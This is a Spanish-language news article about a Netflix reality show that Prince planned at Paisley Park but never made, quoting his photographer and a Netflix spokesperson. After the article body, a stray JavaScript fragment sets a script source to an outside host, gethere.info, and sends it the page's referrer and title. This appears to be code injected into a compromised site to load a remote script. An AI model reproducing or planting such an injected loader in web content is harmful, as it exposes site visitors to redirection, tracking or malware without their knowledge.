El reality de Prince en Netflix que nunca sucedió

El legendario músico, fallecido este año, tenía planeado ingresar a la pantalla chica

El evento hubiera sido único: sería el primer reality producido por Netflix y traería al mundo entero una visión hacia el interior creativo de una de las grandes figuras de la música, así como un paseo por uno de los estudios de grabación más legendarios.

Más o menos así iba a ser un proyecto que Prince estaba preparando con el popular servicio de streaming, según dijo un vocero de esta plataforma. La idea era adentrarse en los estudios Paisley Park, de Minnesota, construidos por Prince tras el éxito de “Purple Rain” (1984).

Ese lugar no sólo fue el hogar musical de Prince, pues ahí también grabaron Madonna, Stevie Wonder, R.E.M., entre otros.

Maya Washington, fotógrafa del cantante, reveló a la revista GQ las pláticas que tuvo con Prince respecto a este programa, que supuestamente mostraría su “lado gracioso”. “Y lo dio por cerrado: ‘Maya, no puedo ser gracioso. Tengo que salvar al mundo’”, recordó la fotógrafa.

“Tuvimos discusiones sobre esto, pero tristemente para nosotros no se concretó antes de su partida”, dijo, por otro lado un vocero de Netflix, servicio que ha realizado varias series originales, pero nunca un reality.

Prince falleció en abril pasado de una sobredosis. Tras su muerte, los estudios Paisley Park han estado abiertos para visitas guiadas al público.

 

 

676055_princes.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado